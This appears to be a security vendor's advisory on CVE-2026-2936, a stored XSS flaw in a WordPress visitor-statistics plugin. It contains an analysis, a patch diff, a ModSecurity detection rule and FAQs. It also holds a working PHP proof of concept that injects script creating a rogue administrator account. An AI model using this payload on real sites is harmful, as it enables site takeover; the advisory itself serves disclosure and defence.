What is CVE-2026-2936?

CVE-2026-2936 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the Visitor Traffic Real Time Statistics plugin for WordPress. It allows attackers to inject arbitrary JavaScript code via the ‘page_title’ parameter, which executes when an administrator views specific plugin sections.

Who is affected by this vulnerability?

All WordPress installations using the Visitor Traffic Real Time Statistics plugin version 8.4 or earlier are affected by CVE-2026-2936. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and look for the Visitor Traffic Real Time Statistics plugin. If the version is 8.4 or lower, your site is at risk.

What are the practical risks of this vulnerability?

The CVSS score of 7.2 indicates a high risk level, meaning successful exploitation can lead to serious consequences such as session hijacking, site defacement, or privilege escalation. An attacker could potentially create new administrator accounts without any user interaction.

How can I mitigate this vulnerability?

To mitigate this vulnerability, immediately update the Visitor Traffic Real Time Statistics plugin to version 8.5 or later, where the issue has been patched. Regularly check for updates and apply them promptly to maintain security.

What does the patch for this vulnerability include?

The patch for CVE-2026-2936 improves input sanitization and output escaping for the ‘page_title’ parameter. It replaces the previous sanitization method with a more robust chain of functions to ensure that any potentially harmful scripts are neutralized before being stored.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored in the application’s database. These scripts are executed in the context of a user who accesses the affected page, potentially allowing the attacker to perform actions on behalf of that user.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can send a specially crafted POST request to the vulnerable AJAX endpoint, including a malicious payload in the ‘page_title’ parameter. Once stored, this payload executes when an administrator views the affected section of the plugin, demonstrating the risk of the vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling it until a patch can be applied. Additionally, review user permissions and limit access to the WordPress admin area to trusted users only.

Are there any other security best practices I should follow?

In addition to updating vulnerable plugins, implement regular backups, use strong passwords, enable two-factor authentication, and regularly review user roles and permissions to enhance the overall security of your WordPress site.

What is the significance of the CVSS score?

The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 7.2 indicates a high level of risk, suggesting that the vulnerability could be exploited easily and has the potential for significant impact on the affected system.

Where can I find more information about this vulnerability?

For more information on CVE-2026-2936, you can visit the official CVE database, security advisories from the plugin developers, or security-focused blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-2936: Visitor Traffic Real Time Statistics <= 8.4 – Unauthenticated Stored Cross-Site Scripting (visitors-traffic-real-time-statistics)

CVE ID CVE-2026-2936

Plugin visitors-traffic-real-time-statistics

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 8.4

Patched Version 8.5

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2936:
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the Visitor Traffic Real Time Statistics WordPress plugin. The vulnerability exists in versions up to and including 8.4. Attackers can inject malicious scripts via the `page_title` parameter, which executes when an administrator views the plugin’s Traffic by Title section. The CVSS score of 7.2 reflects a high-severity risk.

The root cause is insufficient input sanitization and output escaping for the `page_title` parameter. In the vulnerable code within `/visitors-traffic-real-time-statistics/functions.php`, the `ahcfree_add_hit` function processes user-supplied POST data. The `page_title` parameter was sanitized using the plugin’s `ahc_free_sanitize_text_or_array_field` function, which proved inadequate for preventing XSS. The vulnerable code path is the AJAX handler that records visitor hits.

Exploitation occurs via a direct POST request to `/wp-admin/admin-ajax.php`. The attacker sets the `action` parameter to `ahc_add_hit` and the `page_title` parameter to a malicious JavaScript payload. The payload is stored in the plugin’s database. When an administrator accesses the ‘Traffic by Title’ section in the WordPress dashboard, the stored script executes in the admin context. This bypasses authentication because the `ahc_add_hit` action lacks a capability check.

The patch modifies the `ahcfree_add_hit` function in `functions.php`. It replaces the call to `ahc_free_sanitize_text_or_array_field` with a more robust sanitization chain. The new code first unslashes the raw POST data, decodes HTML entities, and finally applies WordPress core’s `sanitize_text_field` and `wp_strip_all_tags` functions. This ensures any HTML tags and JavaScript are removed from the `page_title` before storage, neutralizing the XSS vector.

Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into the WordPress admin dashboard. This can lead to session hijacking, site defacement, privilege escalation, or full site compromise by creating new administrator accounts. The attack requires no user interaction beyond an admin viewing a specific plugin page.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/visitors-traffic-real-time-statistics/Visitors-Traffic-Real-Time-Statistics.php
+++ b/visitors-traffic-real-time-statistics/Visitors-Traffic-Real-Time-Statistics.php
@@ -4,7 +4,7 @@
 Description: Hits counter that shows analytical numbers of your WordPress site visitors and hits.
 Author: wp-buy
 Author URI: https://www.wp-buy.com/
-Version: 8.4
+Version: 8.5
 Text Domain: visitors-traffic-real-time-statistics
 Domain Path: /languages
 */
@@ -85,6 +85,15 @@

 add_action('plugins_loaded', 'ahcfree_init');
 add_action('plugins_loaded', 'ahcfree_multisite_init', 99);
+
+
+add_action('ahc_cleanup_event', ['WPHitsCounter', 'run_cleanup']);
+
+register_activation_hook(__FILE__, ['WPHitsCounter', 'schedule_cleanup']);
+
+register_deactivation_hook(__FILE__, ['WPHitsCounter', 'unschedule_cleanup']);
+
+
 //if ( function_exists('get_plugin_data') ) {
 //	$woodhl_detail = get_plugin_data( __FILE__ );
 //	$installed_version = get_option( 'visitors-traffic-real-time-statistics-pro-version' );
--- a/visitors-traffic-real-time-statistics/WPHitsCounter.php
+++ b/visitors-traffic-real-time-statistics/WPHitsCounter.php
@@ -101,10 +101,14 @@
 	{


+		$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';

+	if (preg_match('/bot|crawl|slurp|spider|mediapartners/i', $user_agent)) {
+		return;
+	}
 		//$this->cleanUnwantedRecords();

-		$this->cleanHitsTable();
+		//$this->cleanHitsTable();

 		if (!$this->isHitRecorded()) {

@@ -592,7 +596,7 @@
 	 * @return boolean

 	 */
-	public function cleanHitsTable()
+		public function cleanHitsTable()
 	{
 		global $wpdb;

@@ -1274,4 +1278,39 @@
 		error_log('Storing in UTC: ' . json_encode($result));
 		return $result;
 	}
+
+
+
+
+public static function schedule_cleanup() {
+
+    if (!wp_next_scheduled('ahc_cleanup_event')) {
+
+        wp_schedule_event(time() + 300, 'daily', 'ahc_cleanup_event');
+
+    }
+
+}
+
+public static function unschedule_cleanup() {
+
+    $timestamp = wp_next_scheduled('ahc_cleanup_event');
+
+    if ($timestamp) {
+
+        wp_unschedule_event($timestamp, 'ahc_cleanup_event');
+
+    }
+
+}
+
+public static function run_cleanup() {
+
+if (!isset($_SERVER['HTTP_USER_AGENT'])) $_SERVER['HTTP_USER_AGENT'] = 'wp-cron';
+    if (!isset($_SERVER['REQUEST_URI'])) $_SERVER['REQUEST_URI'] = '/wp-cron.php';
+
+    $counter = new self(0);
+    $counter->cleanHitsTable();
+
+}
 }
--- a/visitors-traffic-real-time-statistics/functions.php
+++ b/visitors-traffic-real-time-statistics/functions.php
@@ -1389,6 +1389,18 @@
     foreach ($sqlQueries as $sql) {
         $wpdb->query($sql);
     }
+
+
+	 if (get_option('ahc_db_indexes_ahc_online_users_added')) {
+        return;
+    }
+
+
+    $wpdb->query("ALTER TABLE ahc_hits ADD INDEX idx_hit_date (hit_date)");
+    $wpdb->query("ALTER TABLE ahc_hits ADD INDEX idx_ip_page (hit_ip_address, hit_page_id)");
+    $wpdb->query("ALTER TABLE ahc_online_users ADD INDEX idx_online_date (`date`)");
+
+    update_option('ahc_db_indexes_ahc_online_users_added', 1);
 }

 function ahcfree_add_settings()
@@ -3289,7 +3301,11 @@


             $page_id = intval($_POST['page_id']);
-            $page_title = ahc_free_sanitize_text_or_array_field($_POST['page_title']);
+           // $page_title = ahc_free_sanitize_text_or_array_field($_POST['page_title']);
+
+            $page_title_raw = isset($_POST['page_title']) ? wp_unslash($_POST['page_title']) : '';
+			$page_title_decoded = html_entity_decode($page_title_raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
+			$page_title = sanitize_text_field(wp_strip_all_tags($page_title_decoded, true));
             $post_type = ahc_free_sanitize_text_or_array_field($_POST['post_type']);
             $_SERVER['HTTP_REFERER'] = ahc_free_sanitize_text_or_array_field($_POST['referer']);
             $_SERVER['HTTP_USER_AGENT'] = ahc_free_sanitize_text_or_array_field($_POST['useragent']);

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2936
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1002936,phase:2,deny,status:403,chain,msg:'CVE-2026-2936 via Visitor Traffic Real Time Statistics AJAX',severity:'CRITICAL',tag:'CVE-2026-2936',tag:'WordPress',tag:'Plugin',tag:'XSS'"
  SecRule ARGS_POST:action "@streq ahc_add_hit" "chain"
    SecRule ARGS_POST:page_title "@rx <[^>]*script[^>]*>"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2936 - Visitor Traffic Real Time Statistics <= 8.4 - Unauthenticated Stored Cross-Site Scripting
<?php

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Malicious JavaScript payload to execute in the admin context.
// This example creates a new administrator user.
$payload = '<script>fetch("/wp-admin/user-new.php", {method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"action=createuser&_wpnonce_create-user=[NONCE]&user_login=attacker&email=attacker@example.com&pass1=Password123&pass2=Password123&role=administrator",credentials:"include"});</script>';

// Prepare POST data for the vulnerable AJAX action.
$post_fields = [
    'action' => 'ahc_add_hit', // The vulnerable AJAX hook.
    'page_title' => $payload, // The unsanitized parameter.
    'page_id' => '1', // A valid page ID.
    'post_type' => 'page',
    'referer' => '',
    'useragent' => 'Atomic Edge PoC',
    'screen_resolution' => '1920x1080'
];

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);

// Execute the request to inject the payload.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response.
if ($http_code == 200) {
    echo "Payload injected successfully.n";
    echo "When an administrator views the 'Traffic by Title' section, the script will execute.n";
} else {
    echo "Injection may have failed. HTTP Code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2026-2936?
Overview of the vulnerability
CVE-2026-2936 is a high-severity unauthenticated stored cross-site scripting (XSS) vulnerability in the Visitor Traffic Real Time Statistics plugin for WordPress. It allows attackers to inject arbitrary JavaScript code via the ‘page_title’ parameter, which executes when an administrator views specific plugin sections.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress installations using the Visitor Traffic Real Time Statistics plugin version 8.4 or earlier are affected by CVE-2026-2936. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and look for the Visitor Traffic Real Time Statistics plugin. If the version is 8.4 or lower, your site is at risk.
What are the practical risks of this vulnerability?
Understanding the impact
The CVSS score of 7.2 indicates a high risk level, meaning successful exploitation can lead to serious consequences such as session hijacking, site defacement, or privilege escalation. An attacker could potentially create new administrator accounts without any user interaction.
How can I mitigate this vulnerability?
Steps to secure your site
To mitigate this vulnerability, immediately update the Visitor Traffic Real Time Statistics plugin to version 8.5 or later, where the issue has been patched. Regularly check for updates and apply them promptly to maintain security.
What does the patch for this vulnerability include?
Details of the fix
The patch for CVE-2026-2936 improves input sanitization and output escaping for the ‘page_title’ parameter. It replaces the previous sanitization method with a more robust chain of functions to ensure that any potentially harmful scripts are neutralized before being stored.
What is stored cross-site scripting (XSS)?
Definition and explanation
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored in the application’s database. These scripts are executed in the context of a user who accesses the affected page, potentially allowing the attacker to perform actions on behalf of that user.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation process
The proof of concept shows how an attacker can send a specially crafted POST request to the vulnerable AJAX endpoint, including a malicious payload in the ‘page_title’ parameter. Once stored, this payload executes when an administrator views the affected section of the plugin, demonstrating the risk of the vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider disabling it until a patch can be applied. Additionally, review user permissions and limit access to the WordPress admin area to trusted users only.
Are there any other security best practices I should follow?
Enhancing overall security
In addition to updating vulnerable plugins, implement regular backups, use strong passwords, enable two-factor authentication, and regularly review user roles and permissions to enhance the overall security of your WordPress site.
What is the significance of the CVSS score?
Understanding CVSS metrics
The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 7.2 indicates a high level of risk, suggesting that the vulnerability could be exploited easily and has the potential for significant impact on the affected system.
Where can I find more information about this vulnerability?
Resources for further reading
For more information on CVE-2026-2936, you can visit the official CVE database, security advisories from the plugin developers, or security-focused blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations